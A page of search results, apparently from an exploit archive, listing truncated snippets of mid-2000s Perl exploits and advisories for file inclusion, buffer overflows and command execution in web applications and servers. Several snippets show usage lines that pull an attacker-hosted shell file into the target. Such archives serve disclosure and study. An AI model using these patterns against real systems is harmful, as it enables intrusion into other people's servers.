178 matches found
phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion
!/usr/bin/perl Journals System Independant Journals System for phpBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://projects.nbishop.name/phpbb/files/journalssystem1.0.2.zip use IO::Socket; use LWP::Simple;...
phpBB 2.0.21 - Poison Null Byte Remote File Upload
phpBB 2.0.21 - Poison Null Byte Remote File Upload !/usr/bin/perl -w Author: ShAnKaR Title: multiple PHP application poison NULL byte vulnerability Applications: phpBB 2.0.21, punBB 1.2.12 Threat Level: Critical Original advisory in Russian: http://www.security.nnov.ru/Odocument221.html Poison NU...
Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion
!/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - Socketwiz Bookmarks perl exploit.pl http://site.com/Socketwiz BookmarksPath/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; $sciezka = $ARGV0; $sciezk...
adv45-K-159-2006.txt
ECHOADV45$2006 ----------------------------------------------------------------------------------------- ECHOADV45$2006 WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran...
[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability
ECHOADV45$2006 ----------------------------------------------------------------------------------------- ECHOADV45$2006 WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran...
RadScripts RadLance 7.0 - popup.php Local File Inclusion
RadScripts RadLance 7.0 - popup.php Local File Inclusion source: https://www.securityfocus.com/bid/17975/info RadLance is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. RadLance Gold 7.0 is reported affected by this issue...
zawhttpd0823.txt
Name: zawhttpd Version: 0.8.23 previous version probably too. Language: C Problem: Buffer Overflow Vendor: http://www.norz.org/zawhttpd.html Discovered by: Kamil 'K3' Sienicki Description: zawhttpd is a mini Web server that features HTTP/1.0 and 1.1 support, keep-alive persistent connections, IPv...
jetboxCMS.txt
!/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisory: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.com/ The file jetbox/includes/phpdig/includes/config.php uses...
[ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure
/ / | | / // / | | Y / | / / /| / / / / / / .OR.ID ECHOADV28$2006 --------------------------------------------------------------------------- ECHOADV28$2006 Clever Copy = 3.0 Connect.inc Critical Information Disclosure ---------------------------------------------------------------------------...
[ECHO_ADV_27$2006] AngelineCMS 0.8.1 Installpath Remote File Inclusion
/ / | | / // / | | Y / | / / /| / / / / / / .OR.ID ECHOADV27$2006 --------------------------------------------------------------------------- ECHOADV27$2006 AngelineCMS 0.8.1 Installpath Remote File Inclusion --------------------------------------------------------------------------- Author :...
TFT Gallery 0.10 - Password Disclosure
!/usr/bin/perl Copyright C undefined1 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option any later version. This program is...
AWStats < 6.4 (referer) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl AWStats 6.4 command execution exploit based on http://www.idefense.com/application/poi/display?id=290&type=vulnerabilities coded by 1dt.w0lf 11.08.2005 RST/GHC http://rst.void.ru http://ghc.ru Note Exploitation will not occur until the stats page...
myquiz101.pl.txt
This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit. Athour : Hessam-x - www.hessamx.net +IHST : iran hackerz security team hackerz.ir Perl exploit !/usr/bin/perl = MyQuiz Remote Command Execution Exploit - By Hessam-x / www.hackerz.ir manual exploiting --...
MyQuiz Arbitrary Command Execution Exploit (perl)
This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit. Athour : Hessam-x - www.hessamx.net +IHST : iran hackerz security team hackerz.ir Perl exploit !/usr/bin/perl = MyQuiz Remote Command Execution Exploit - By Hessam-x / www.hackerz.ir manual exploiting --...
creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit
No description provided by source. !/usr/bin/perl creLoaded = 6.15 HTMLAREA automated perl exploit hacked up by kaneda [email protected] Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and utilise that to execute commands, and show off a fake shell. C...
creLoaded 6.15 - HTMLAREA Automated Perl
creLoaded 6.15 - HTMLAREA Automated Perl !/usr/bin/perl creLoaded Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and utilise that to execute commands, and show off a fake shell. Can specify: User-defined PHP script or one provided in this script suits most...
Cray UNICOS usrbinscript - Command Line Argument Local Overflow
Cray UNICOS usrbinscript - Command Line Argument Local Overflow source: https://www.securityfocus.com/bid/16205/info Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities wi...
FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "143", ; unless $remote...
GTChat <= 0.95 Alpha Remote Denial of Service Exploit
Exploit for cgi platform in category web applications ===================================================== GTChat = 0.95 Alpha Remote Denial of Service Exploit ===================================================== !/usr/bin/perl use LWP::Simple; if @ARGV 3 print "\nUsage: $0 server path mode cou...
ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow
ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow source: https://www.securityfocus.com/bid/13351/info A remotely exploitable client-side buffer-overflow vulnerability affects ImageMagick. This issue occurs because the application fails to properly validate the length of user-supplied...